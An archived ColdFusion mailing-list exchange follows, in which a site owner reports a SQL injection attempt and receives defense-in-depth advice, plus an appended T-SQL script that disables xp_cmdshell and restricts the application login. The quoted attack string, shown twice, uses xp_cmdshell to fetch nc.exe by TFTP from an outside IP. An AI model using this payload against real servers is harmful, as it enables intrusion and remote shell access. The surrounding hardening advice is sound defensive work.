> I've been getting some attacks with the following query string:
>
> The query string was:
> rid=663;exec%20master..xp_cmdshell%20%22tftp%20-i%2084.26.250.77%20get%20nc.exe%20c:\nc.exe%22;--
> Remote Address: 84.26.250.77
>
> Is there anything else I need to worry about besides having
> cfqueryparam on the SELECT statement? Or is that sufficient?
If you are using CFQUERYPARAM exclusively, you don't have to worry about these. However, this is where "defense-in-depth" applies: you should have several things in place to prevent this from working.

If you're using SQL Server (which is the only database that this particular SQL injection attack targets), you should ensure that it is properly hardened. For example: ensure you're using a non-privileged login from CF; ensure that it can't run xp_cmdshell and other security-sensitive commands (you may drop those entirely if you're not using them at all); implement egress filtering on your database server (so it can't make outbound TFTP connections, for example); place appropriate ACLs on sensitive OS system files (like tftp.exe); and so on.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!

Message: http://www.houseoffusion.com/lists.cfm/link=i:4:239914
Archives: http://www.houseoffusion.com/cf_lists/threads.cfm/4
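The SQL Server side of the hardening Dave describes (turn off xp_cmdshell, run CF as a non-privileged login, verify both), as an added T-SQL example that is not part of the original post or of Fig Leaf's material. It assumes SQL Server 2005 or later (sp_configure 'xp_cmdshell' and sys.configurations do not exist on SQL Server 2000, where the equivalent is sp_dropextendedproc 'xp_cmdshell'); the database name webapp, table dbo.records, column rid and the login cf_app are placeholders. Run it as a sysadmin; the impersonation check at the end must print OK.

```sql
-- Added example, not from the original post. Assumes SQL Server 2005+.
-- webapp, dbo.records, rid and cf_app are placeholder names.

-- What the attack in the quoted message becomes when the page builds its SQL
-- by concatenation. With cfqueryparam (cfsqltype="cf_sql_integer") the whole
-- value is bound as one parameter and the second statement never runs:
--   SELECT * FROM dbo.records
--   WHERE rid=663;exec master..xp_cmdshell "tftp -i 84.26.250.77 get nc.exe c:\nc.exe";--

-- 1. Disable xp_cmdshell. It is off by default from 2005 onward, but verify
--    rather than assume; it is an advanced option, so expose those first.
USE master;
GO
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;  -- sp_OACreate etc., same risk class
RECONFIGURE;
GO

-- 2. Check: value_in_use must be 0 for both rows.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures');
GO

-- 3. A non-privileged login for ColdFusion: no server role, no db_owner,
--    only the statements the application needs on the objects it touches.
--    Executing xp_cmdshell is restricted to sysadmin unless it is explicitly
--    granted, so keeping this login out of sysadmin is the control.
CREATE LOGIN cf_app
    WITH PASSWORD = 'replace-with-a-strong-generated-password',
         CHECK_POLICY = ON;
GO
USE webapp;
GO
CREATE USER cf_app FOR LOGIN cf_app;
GRANT SELECT, INSERT, UPDATE ON dbo.records TO cf_app;
GO

-- 4. Checks: cf_app is not sysadmin, and cannot run xp_cmdshell even if a
--    later admin re-enables the option. Expected: 0, then an OK line.
SELECT IS_SRVROLEMEMBER('sysadmin', 'cf_app') AS cf_app_is_sysadmin;

USE master;
GO
BEGIN TRY
    EXECUTE AS LOGIN = 'cf_app';
    EXEC master..xp_cmdshell 'whoami';
    REVERT;
    PRINT 'FAIL: cf_app can run xp_cmdshell';
END TRY
BEGIN CATCH
    REVERT;
    PRINT 'OK: xp_cmdshell blocked for cf_app: ' + ERROR_MESSAGE();
END CATCH;
GO
```

The egress-filtering and tftp.exe ACL steps from the reply live on the host, not in SQL Server; they are worth doing as well, because this script only stops the shell from being reached through the database, not an attacker who gets code execution some other way.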

